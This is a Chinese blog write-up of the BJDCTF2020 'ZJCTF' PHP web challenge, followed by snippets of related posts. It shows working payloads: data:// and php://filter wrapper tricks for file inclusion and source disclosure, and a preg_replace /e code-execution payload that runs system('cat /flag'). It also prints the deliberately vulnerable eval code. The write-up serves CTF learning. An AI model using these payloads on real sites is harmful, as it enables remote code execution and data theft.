[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2025-01-05 09:54:57 发布
原创 最新推荐文章于 2025-01-05 09:54:57 发布 · 4.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #web安全

本文详细解析了PHP代码中的命令执行漏洞,通过审计`preg_replace`函数并利用`data://`和`php://filter`协议,展示了如何构造payload获取flag。重点讲解了如何利用正则表达式执行命令和payload构建策略。

web第39题
[BJDCTF2020]ZJCTF,不过如此

打开靶场
在这里插入图片描述
有点眼熟
参考我做的另一道题:buuctf初学者学习记录–[ZJCTF 2019]NiZhuanSiWei
代码审计:

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

第一步:首先接收2个get参数text和file
然后判断是否存在text和读取text的内容判断是否为I have a dream,也就是说我们需要像text中写入I have a dream,使用php伪协议data://text/plain协议,参考:php伪协议
text参数内容:?text=data://text//plain;base64,SSBoYXZlIGEgZHJlYW0=
其中最后的参数为I have a dream的base64加密后的内容
第二步:使用正则匹配判断file参数是否存在flag字符,然后使用include包含文件,提示next.php,说明此时不能直接读取flag.php。需要先查看next.php的内容,使用php://filter协议,参考上面的链接
构造file参数:file=php://filter/read=convert.base64-encode/resource=next.php

两个参数的payload:

?text=data://text//plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php

在这里插入图片描述
得到next.php文件的base64编码后的数据,解码:

$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}


foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}

function getFlag(){
@eval($_GET['cmd']);
}

关键在于return preg_replace(‘/(‘ . $ re . ‘)/ei‘,‘strtolower("\1")‘,$str);
会造成代码执行
具体分析参考: 深入研究 preg_replace /e 模式下的代码漏洞问题

最后又看到get传入cmd参数,可以对其进行命令执行
引用一下大佬的解析:
参考:[BJDCTF2020]ZJCTF,不过如此

preg_replace()函数最后以/e结尾时,会存在命令执行漏洞,也就是说如果有/e,并且匹配到符合正则表达式的字符串,那么第二个参数的字符串将被当做代码来执行

正则表达式的\S:匹配所有非空白字符; .号:匹配除\n外的任意字符;
*号:匹配前面的字符0次或者多次
+号:匹配前面的字符1次或者多次(如果要在url里输入+号,必须要对其进行编码,+号编码为:%2b)

php里,如果 双引号中有变量,那么php解释器会将其替换为变量解释后的结果,但单引号中的变量不会被处理(不过双引号中的函数不会被执行)

这里的话第二个参数为strtolower("\1"),实际上也就是strtolower("\1"),而\1在正则表达式中有自己的意思,也就是指定第一个匹配项,简单来说就是取出正则表达式匹配后子匹配表达式的第一项
接着继续进行审计,来到foreach()函数,这个函数就是把我们传进去的参数变为正则,并且参数值变为字符串

本地测试:
在这里插入图片描述
所以在preg_replace函数中按照一个参数对第三个参数进行匹配后,用第二个参数进行替换后会对匹配到的第一个匹配项加上双引号,从而导致命令执行

构造payload:

?\S*={${getFlag()}}&cmd=system('cat /flag');

这里解释下用\S*而不是用.的原因: 因为在php中,对于传入非法的$_GET参数名,会将其转换为下划线,导致正则匹配失效
所以我们只能使用\S或者\S%2b来进行构造payload

在这里插入图片描述

[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace)
qq_43622442的博客
05-09 2247
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
[bjdctf2020]zjctf不过如此
m0_62593857的博客
08-16 294
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2587
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BJDCTF2020]ZJCTF不过如此1
qq_48008847的博客
07-16 1941
通过分析代码,get传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议中的data://协议用filter协议去读下next.php的源码 获取next.php的payload: index.php?text=data://text..
BJDCTF2020 ZJCTF不过如此 1
最新发布
hddi1的博客
01-05 969
php伪协议 #利用伪协议 #filegetcomtent用phpinput绕过 #PHP对于函数调用的语法问题。
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 727
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2925
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
[BJDCTF2020]ZJCTF不过如此(特详解)
热门推荐
qq_74806534的博客
01-24 1万+
而这段代码里面的第一个子匹配项就是${phpinfo()}。编码设定,这是一个可选项,base64 编码中仅包含 0-9,a-z,A-Z,+,/,=,其中 = 是用来编码补白的。我们先看第二个参数中的\1 ,\1实际上就是 \1,而 \1 在正则表达式中有自己的含义,最后一部分为这个 Data URI 承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容。单引号中的变量不会被处理。这里我们发现了.变成了_,这是因为php会将传入的非法的参数名转成下滑线,所以我们的正则匹配才会失效。
ZJCTF不过如此
evil_ming的博客
05-07 128
打开靶机 看见if知道条件要求写text函数包含i have a dream。 一整个疑惑住,返回重看一下发现漏了个点,重新补上要求包含的next.php。 index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php base64解码 next.php?\S%2b=${getFlag()}&cmd=system(
[BJDCTF2020]ZJCTF不过如此(php伪协议,data伪协议,preg_replace /e漏洞)
weixin_44110537的博客
10-04 585
伪协议常用在文件包含漏洞中. 常见的文件包含函数有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile. 具体的函数功能可以参考. 伪协议的学习 通过data协议构造 data://text/plain,I have a dream 通过php协议构造 php://filter/convert.base64-encode/resource=ne.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值